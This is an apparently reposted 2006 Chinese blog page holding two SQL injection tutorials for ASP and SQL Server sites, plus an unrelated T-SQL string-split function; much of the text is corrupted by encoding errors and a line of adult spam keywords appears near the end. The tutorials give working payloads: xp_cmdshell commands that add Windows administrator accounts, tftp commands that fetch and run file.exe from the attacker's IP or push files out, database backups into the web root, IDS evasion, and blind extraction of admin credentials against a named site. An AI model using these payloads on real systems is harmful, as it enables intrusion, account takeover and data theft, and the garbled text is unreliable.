桂林老兵的SQLSERVER高��注入技�?转帖)

my java — Sun, 05 Feb 2006 02:04:00 GMT

[获得数据表名][��字�D�值更��Cؓ表名�Q�再��x��d��q�个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条�g]

[获得数据表字�D�名][��字�D�值更��Cؓ字段名，再想法读��个字�D늚�值就可得到字�D�名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条�g]

也可以这��h��L��获取表名�Q?/P>

select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',�?

通过SQLSERVER注入漏洞建数据库��理员帐号和�pȝ��理员帐号[当前帐号必须是SYSADMIN�l�]

news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //��d��数据库用��L��户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果��x��密码�Q�则用这句（��test的密码改�?23456�Q?BR>news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //��test加到sysadmin�l?�q�个�l�的成员可执行�Q何操�?BR>news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //��d��pȝ��用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //��系�l�用户test提升为管理员

�q�样�Q�你在他的数据库和系�l�内都留下了test��理员�̎号了

下面是如何从你的服器下蝲文�gfile.exe后运行它[前提是你必须��你的电脑设为TFTP服务器，��?9端口打开]

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--

然后�q�行�q�个文�g�Q?BR>id=2; exec master.dbo.xp_cmdshell 'file.exe';--

下蝲服务器的文�gfile2.doc到本地TFTP服务器[文�g必须存在]:

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--

�l�过IDS的检��[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm�?’dshell' exec @a 'dir c:\'

my java 2006-02-05 10:04 发表评论

SQL注入天书

my java — Sun, 05 Feb 2006 01:58:00 GMT

随着B/S模式应用开发的发展�Q��用这�U�模式编写应用程序的�E�序员也��来��多。但是由于这个行业的入门门槛不高�Q�程序员的水�q�_��l�验也参差不齐，相当大一部分�E�序员在�~�写代码的时候，没有对用戯��入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一�D�|��据库查询代码�Q�根据程序返回的�l�果�Q�获得某些他惛_��知的数据�Q�这��是所谓的SQL Injection�Q�即�Q�I��Q�注入�?

�Q�I��Q�注入是从正常的WWW端口讉K��Q�而且表面看�v来跟一般的Web��面讉K��没什么区别，所以目前市面的防火墙都不会对Ｓ�Q�Ｌ注入发出警报�Q�如果管理员没查看IIS*志的习惯�Q�可能被入��R很长旉��都不会发觉�?

但是�Q�Ｓ�Q�Ｌ注入的手法相当灵�z�，在注入的时候会��到很多意外的情��c��能不能�Ҏ��具体情况�q�行分析�Q�构造��y妙的SQL语句�Q�从而成功获取想要的数据�Q�是高手与“菜鸟”的�Ҏ��区别�?

�Ҏ��国情�Q�国内的�|�站用ASP Access或SQLServer的占70%以上�Q�PHP MySQ占L20%�Q�其他的不��10%。在本文�Q�我们从分入门、进阶至高��讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写�Q�希望对安全工作者和�E�序员都有用处。了解ASP注入的朋友也请不要蟩�q�入门篇�Q�因为部分�h�Ҏ��入的基本判断�Ҏ��q�存在误区。大家准备好了吗�Q�Let's Go...

�?�?��?

如果你以前没试过�Q�I��Q�注入的话，那么�W�一步先把IE菜单=>工具=>Internet选项=>高��=>昄��友好HTTP 错误信息前面的勾��L��。否则，不论服务器返回什么错误，IE都只昄��为HTTP 500服务器错误，不能获得更多的提�C�Z��息�?

�W�一节、Ｓ�Q�Ｌ注入原理

以下我们从一个网www.19cn.com开始（注：本文发表前已征得该站站长同意�Q�大部分都是真实数据�Q��?

在网站首��上�Q�有名�ؓ“IE不能打开新窗口的多种解决�Ҏ��”的链接�Q�地址为：http://www.19cn.com/showdetail.asp?id=49�Q�我们在�q�个地址后面加上单引号’，服务器会�q�回下面的错误提�C�：

Microsoft JET Database Engine 错误 '80040e14'字符串的语法错误在查询表辑ּ� 'ID=49'' 中�?

/showdetail.asp�Q�行8

从这个错误提�C�我们能看出下面几点�Q?

1.�|�站使用的是Access数据库，通过JET引擎�q�接数据库，而不是通过ODBC�?

2. �E�序没有判断客户端提交的数据是否�W�合�E�序要求�?

3. 该SQL语句所查询的表中有一名�ؓID的字�D�c�?

从上面的例子我们可以知道�Q�Ｓ�Q�Ｌ注入的原理，��是从客��L��提交�Ҏ��的代码，从而收集程序及服务器的信息�Q�从而获取你惛_��得到的资料�?

�W�二节、判断能否进行Ｓ�Q�Ｌ注入

看完�W�一节，有一些�h会觉得：我也是经常这��h��试能否注入的�Q�这不是很简单吗�Q?

其实�Q�这�q�不是最好的�Ҏ��Q��ؓ什么呢�Q?
首先�Q�不一定每台服务器的IIS都返回具体错误提�C�给客户端，如果�E�序中加了cint(参数)之类语句的话�Q�Ｓ�Q�Ｌ注入是不会成功的�Q�但服务器同样会报错�Q�具体提�C�Z��息�ؓ处理 URL 时服务器上出错。请和系�l�管理员联络�?

其次�Q�部分对�Q�I��Q�注入有一点了解的�E�序员，认�ؓ只要把单引号�q��o掉就安全了，�q�种情况不�ؓ��数�Q�如果你用单引号��试�Q�是��不到注入点的那么，什么样的测试方法才是比较准��呢�Q�答案如下：

�?http://www.19cn.com/showdetail.asp?id=49

�?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=1

�?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=2

�q�就是经典的1=1�?=2��试法了�Q�怎么判断呢？看看上面三个�|�址�q�回的结果就知道了：

可以注入的表玎ͼ�

�?正常昄��Q�这是必然的�Q�不然就是程序有错误了）

�?正常昄��Q�内容基本与①相�?

�?提示BOF或EOF�Q�程序没做�Q何判断时�Q�、或提示找不到记录（判断了rs.eof�Ӟ��、或昄��内容为空�Q�程序加了on error resume next�Q�不可以注入��比较容易判断了�Q�①同样正常昄��Q�②和③一般都会有�E�序定义的错误提�C�，或提�C�类型�{换时出错�?

　　当然�Q�这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字�W�型和搜索型参数�Q�我��在中�񔽋�的“Ｓ�Q�Ｌ注入一般步骤”再做分析�?

�W�三节、判断数据库�c�d��及注入方�?

不同的数据库的函数、注入方法都是有差异的，所以在注入之前�Q�我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer�Q�网上超�q?9%的网站都是其中之一�?

怎么让程序告诉你它��用的什么数据库呢？来看看：

SQLServer有一些系�l�变量，如果服务器IIS提示没关闭，�q�且SQLServer�q�回错误提示的话�Q�那可以直接从出错信息获取，�Ҏ��如下�Q?

http://www.19cn.com/showdetail.asp?id=49;;and user>0

�q�句语句很简单，但却包含了SQLServer�Ҏ��注入�Ҏ��的精髓，我自�׃��是在一�ơ无意的��试中发现这�U�效率极高的猜解�Ҏ��。让我看来看看它的含义：首先�Q�前面的语句是正常的�Q�重点在anduser>0�Q�我们知道，user是SQLServer的一个内�|�变量，它的值是当前�q�接的用户名�Q�类型�ؓnvarchar。拿一个nvarchar的��D��int的数0比较�Q�系�l�会先试囑ְ�nvarchar的��D�{成int型，当然�Q��{的过�E�中肯定会出错，SQLServer的出错提�C�是�Q�将nvarchar�?”abc�?转换数据�c�d��?int 的列时发生语法错误，呵呵�Q�abc正是变量user的��|��q�样�Q�不废吹��C��力就拿到了数据库的用户名。在以后的篇�q�里�Q�大家会看到很多用这�U�方法的语句�?

��Z��说几句，众所周知�Q�SQLServer的用户sa是个�{�同Adminstrators权限的角�Ԍ��拿到了sa权限�Q�几乎肯定可以拿��C��机的Administrator了。上面的�Ҏ��可以很方便的��试出是否是用sa��d��Q�要注意的是�Q�如果是sa��d��Q�提�C�是��”dbo”�{换成int的列发生错误�Q�而不是”sa”�?

如果服务器IIS不允许返回错误提�C�，那怎么判断数据库类型呢�Q�我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系�l�表�Q�比如存放数据库中所有对象的表，Access是在�pȝ��表[msysobjects]中，但在Web环境下读该表会提�C�“没有权限”，SQLServer是在表[sysobjects]中，在Web环境�?

可正常读取�?

在确认可以注入的情况下，使用下面的语句：

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from msysobjects)>0

如果数据库是SQLServer�Q�那么第一个网址的页面与原页�?A target=_blank>http://www.19cn.com/showdetail.asp?id=49是大致相同的�Q�而第二个�|�址�Q�由于找不到表msysobjects�Q�会提示出错�Q�就��程序有定w��处理�Q�页面也与原��面完全不同�?

如果数据库用的是Access�Q�那么情况就有所不同�Q�第一个网址的页面与原页面完全不同；�W�二个网址�Q�则视乎数据库设�|�是否允许读该系�l�表�Q�一般来说是不允许的�Q�所以与原网址也是完全不同。大多数情况下，用第一个网址��可以得知系�l�所用的数据库类型，�W�二个网址只作为开启IIS错误提示时的验证�?

�q?�?��?

在入门篇�Q�我们学会了�Q�I��Q�注入的判断�Ҏ��Q�但真正要拿到网站的保密内容�Q�是�q�远不够的。接下来�Q�我们就�l�箋学习如何从数据库中获取想要获得的内容�Q�首先，我们先看看Ｓ�Q�Ｌ注入的一般步骤：

�W�一节、Ｓ�Q�Ｌ注入的一般步�?

首先�Q�判断环境，��L��注入点，判断数据库类型，�q�在入门��已�l�讲�q�了�?

其次�Q�根据注入参数类型，在脑��中重构SQL语句的原貌，按参数类型主要分��Z��面三�U�：

(A) ID=49 �q�类注入的参数是数字型，SQL语句原貌大致如下�Q?
Select * from 表名 where 字段=49
注入的参��CؓID=49 And [查询条�g]�Q�即是生成语句：
Select * from 表名 where 字段=49 And [查询条�g]

(B) Class=�q�箋�?�q�类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连�l�剧�?
注入的参��CؓClass=�q�箋剧�?and [查询条�g] and ‘�?�?�Q�即是生成语句：
Select * from 表名 where 字段=’连�l�剧�?and [查询条�g] and ‘�?’�?

(C) 搜烦时没�q��o参数的，如keyword=关键字，SQL语句原貌大致如下�Q?
Select * from 表名 where 字段like �?关键�?�?
注入的参��Cؓkeyword=�?and [查询条�g] and �?�?’， ��x��生成语句�Q?
Select * from 表名 where字段like �?�?and [查询条�g] and �?�?�?�?

接着�Q�将查询条�g替换成SQL语句�Q�猜解表名，例如�Q?

ID=49 And (Select Count(*) from Admin)>=0

如果��面��׃��ID=49的相同，说明附加条�g成立�Q�即表Admin存在�Q�反之，即不存在�Q�请牢记�q�种�Ҏ��Q��?

如此循环�Q�直至猜到表名�ؓ止�?

表名猜出来后�Q�将Count(*)替换成Count(字段�?�Q�用同样的原理猜解字�D�名�?

有�h会说�Q�这里有一些偶然的成分�Q�如果表名�v得很复杂没规律的�Q�那�Ҏ��没得玩下去了。说得很对，�q�世界根本就不存�?00%成功的黑客技术，苍蝇不叮无缝的蛋�Q�无论多技术多高深的黑客，都是因�ؓ别�h的程序写得不严密或��用者保密意识不够，才有得下手�?

有点跑题了，话说回来�Q�对于SQLServer的库�Q�还是有办法让程序告诉我们表名及字段名的�Q�我们在高�񔽋�中会做介绍�?

最后，在表名和列名猜解成功后，再��用SQL语句�Q�得出字�D늚��|��下面介绍一�U�最常用的方法－Ascii逐字解码法，虽然�q�种�Ҏ��速度很慢�Q�但肯定是可行的�Ҏ��?

我们举个例子�Q�已知表Admin中存在username字段�Q�首先，我们取第一条记录，��试长度�Q?

http://www.19cn.com/showdetail.asp?id=49;;and (select top 1 len(username) from Admin)>0

先说明原理：如果top 1的username长度大于0�Q�则条�g成立�Q�接着��是>1�?gt;2�?gt;3�q�样��试下去�Q�一直到条�g不成立�ؓ止，比如>7成立�Q?gt;8不成立，��是len(username)=8

　　当然没�h会笨得从0,1,2,3一个个��试�Q�怎么��h��比较快就看各自发挥了。在得到username的长度后�Q�用mid(username,N,1)截取�W�N位字�W�，再asc(mid(username,N,1))得到ASCII码，比如�Q?

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步�~�小范围的方法得到第1位字�W�的ASCII码，注意的是英文和数字的ASCII码在1-128之间�Q�可以用折半法加速猜解，如果写成�E�序��试�Q�效率会有极大的提高�?

�W�二节、Ｓ�Q�Ｌ注入常用函数

有SQL语言基础的�h�Q�在�Q�I��Q�注入的时候成功率比不熟悉的�h高很多。我们有必要提高一下自��q��SQL水��^�Q�特别是一些常用的函数及命令�?

Access�Q�asc(字符) SQLServer�Q�unicode(字符)

作用�Q�返回某字符的ASCII�?

Access�Q�chr(数字) SQLServer�Q�nchar(数字)

作用�Q�与asc相反�Q�根据ASCII码返回字�W?

Access�Q�mid(字符�?N,L) SQLServer�Q�substring(字符�?N,L)

作用�Q�返回字�W�串从N个字�W��v长度为L的子字符�Ԍ��即N到N L之间的字�W�串

Access�Q�abc(数字) SQLServer�Q�abc (数字)

作用�Q�返回数字的�l�对��|��在猜解汉字的时候会用到�Q?

Access�Q�A between B And C SQLServer�Q�A between B And C

作用�Q�判断A是否界于B与C之间

�W�三节、中文处理方�?

在注入中��到中文字符是常有的事，有些��Z��到中文字符��想打退堂鼓了。其实只要对中文的编码有所了解�Q�“中文恐惧症”很快可以克服�?

先说一点常识：

Access中，中文的ASCII码可能会出现负数�Q�取��负数后用abs()取绝对��|��汉字字符不变�?

SQLServer中，中文的ASCII为正敎ͼ�但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()�q�回unicode��|��再用nchar函数取得对应的中文字�W��?

了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外�Q�方法是没什么两��L��?

�?�U?��?

看完入门��和�q�阶��后�Q�稍加练习，破解一般的�|�站是没问题了。但如果��到表名列名猜不刎ͼ�或程序作者过滤了一些特�D�字�W�，怎么提高注入的成功率�Q�怎么��h��高猜解效率？请大家接着往下看高�񔽋��?

�W�一节、利用系�l�表注入SQLServer数据�?

SQLServer是一个功能强大的数据库系�l�，与操作系�l�也有紧密的联系�Q�这�l�开发者带来了很大的方便，但另一斚w��Q�也为注入者提供了一个蟩板，我们先来看看几个具体的例子：

�?http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add�?-

　　分号;在SQLServer中表�C�隔开前后两句语句�Q?-表示后面的语句�ؓ注释�Q�所以，�q�句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储�q�程xp_cmdshell�Q�这个存储过�E�用于调用系�l�命令，于是�Q�用net命��o新徏了用户名为name、密码�ؓpassword的windows的帐��P��接着�Q?

�?http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators/add�?-

　　��新建的帐号name加入��理员组�Q�不用两分钟�Q�你已经拿到了系�l�最高权限！当然�Q�这�U�方法只适用于用sa�q�接数据库的情况�Q�否则，是没有权限调用xp_cmdshell的�?

　　�?http://Site/url.asp?id=1 ;;and db_name()>0

前面有个�c�M��的例子and user>0�Q�作用是获取�q�接用户名，db_name()是另一个系�l�变量，�q�回的是�q�接的数据库名�?

�?http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db�?--�q�是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的�l�对路径�Q�将数据库备份到Web目录下面�Q�再用HTTP把整个数据库��完完整整的下蝲回来�Q�所有的��理员及用户密码都一览无遗！在不知道�l�对路径的时候，�q�可以备份到�|�络地址的方法（�?A href="http://file:///202.96.xx.xxShare1.db" target=_blank>\\202.96.xx.xx\Share\1.db�Q�，但成功率不高�?

　　�?http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’and status>0)>0

前面说过�Q�sysobjects是SQLServer的系�l�表�Q�存储着所有的表名、视图、约束及其它对象�Q�xtype=’U’and status>0�Q�表�C�用户徏立的表名�Q�上面的语句��第一个表名取出，�?比较大小�Q�让报错信息把表名暴露出来。第二、第三个表名怎么获取�Q�还是留�l�我们聪明的读者思考吧�?

�?http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名�?,1) from sysobjects)>0

从⑤拿到表名后，用object_id(‘表名�?获取表名对应的内部ID�Q�col_name(表名ID,1)代表该表的第1个字�D�名�Q�将1换成2,3,4...��可以逐个获取所猜解表里面的字段名�?

　　以上6�Ҏ��我研�I�SQLServer注入半年多以来的心血�l�晶�Q�可以看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研�I�SQLServer注入之后�Q�我在开发方面的水��^也得到很大的提高�Q�呵呵，也许安全与开发本来就是相辅相成的吧�?

�W�二节、绕�q�程序限制��l�注�?

在入门篇提到�Q�有很多人喜�Ƣ用’号��试注入漏洞�Q�所以也有很多�h用过滤’号的方法来“防止”注入漏�z�，�q�也许能挡住一些入门者的��d��Q�但对Ｓ�Q�Ｌ注入比较熟悉的�h�Q�还是可以利用相关的函数�Q�达到绕�q�程序限制的目的�?

在“Ｓ�Q�Ｌ注入的一般步骤”一节中�Q�我所用的语句�Q�都是经�q�我优化�Q�让其不包含有单引号的；在“利用系�l�表注入SQLServer数据库”中�Q�有些语句包含有’号�Q�我们�D个例子来看看怎么攚w��这些语句：

��单的如where xtype=’U’，字符U对应的ASCII码是85�Q�所以可以用where xtype=char(85)代替�Q�如果字�W�是中文的，比如where name=’用户’，可以用where name=nchar(29992) nchar(25143)代替�?

�W�三节、经验小�l?

1.有些��Z��q��oSelect、Update、Delete�q�些关键字，但偏偏忘记区分大��写�Q�所以大家可以用selecT�q�样��试一下�?

2.在猜不到字段名时�Q�不妨看看网站上的登录表单，一般�ؓ了方便�v见，字段名都与表单的输入框取相同的名字�?

3.特别注意�Q�地址栏的号传入程序后解释为空��|��+解释�?��P��%解释�?��P��具体可以参考URLEncode的相关介�l��?

4.用Get�Ҏ��注入�Ӟ��IIS会记录你所有的提交字符�Ԍ��对Post�Ҏ��做则不记录，所以能用Post的网址��量不用Get�?

5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用�q�种�Ҏ��Q�只需要两者之间的区别卛_��Q�但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高�?

�?�?�?�?

�Q�I��Q�注入漏�z�可谓是“千里之堤，溃于蚁穴”，�q�种漏洞在网上极为普遍，通常是由于程序员�Ҏ��入不了解�Q�或者程序过滤不严格�Q�或者某个参数忘记检查导致。在�q�里�Q�我�l�大家一个函敎ͼ�代替ASP中的Request函数�Q�可以对一切的SQL注入Say NO�Q�函数如下：

function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符�?
'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型�Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

文章到这里就�l�束了，不管你是安全人员、技术爱好者还是程序员�Q�我都希望本文能对你有所帮助�?BR>

my java 2006-02-05 09:58 发表评论

my java — Tue, 26 Jul 2005 02:24:00 GMT

/*
字符串分拆函�?BR>
--调用�C�Z��
select * from dbo.fsplit('a;adf;fd;ed;dh',';')
select * from dbo.fsplit('a,,adf,,fd,,ed,,dh',',,')
邹徏 2003.07*/

--��查函数是否存�?BR>if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[fsplit]') and xtype in (N'FN', N'IF', N'TF'))
drop function [dbo].[fsplit]
GO

--创徏字符串分拆的函数
create function fsplit(
@str varchar(8000) --要分拆的字符�?BR>,@spli varchar(10) --字符串分隔符
)
returns @re table(istr varchar(8000))
as
begin
declare @i int,@splen int
select @splen=len(@spli)
  ,@i=charindex(@spli,@str)
while @i>0
begin
  insert into @re values(left(@str,@i-1))
  select @str=substring(@str,@i+@splen,8000)
   ,@i=charindex(@spli,@str)
end
if @str<>'' insert into @re values(@str)
return
end

select * from dbo.fsplit(123|abc|000|777','|')

my java 2005-07-26 10:24 发表评论

国产一区不卡在线,少妇精品久久久,亚洲精品一区二区网址

桂林老兵的SQLSERVER高��注入技�?转帖)

SQL注入天书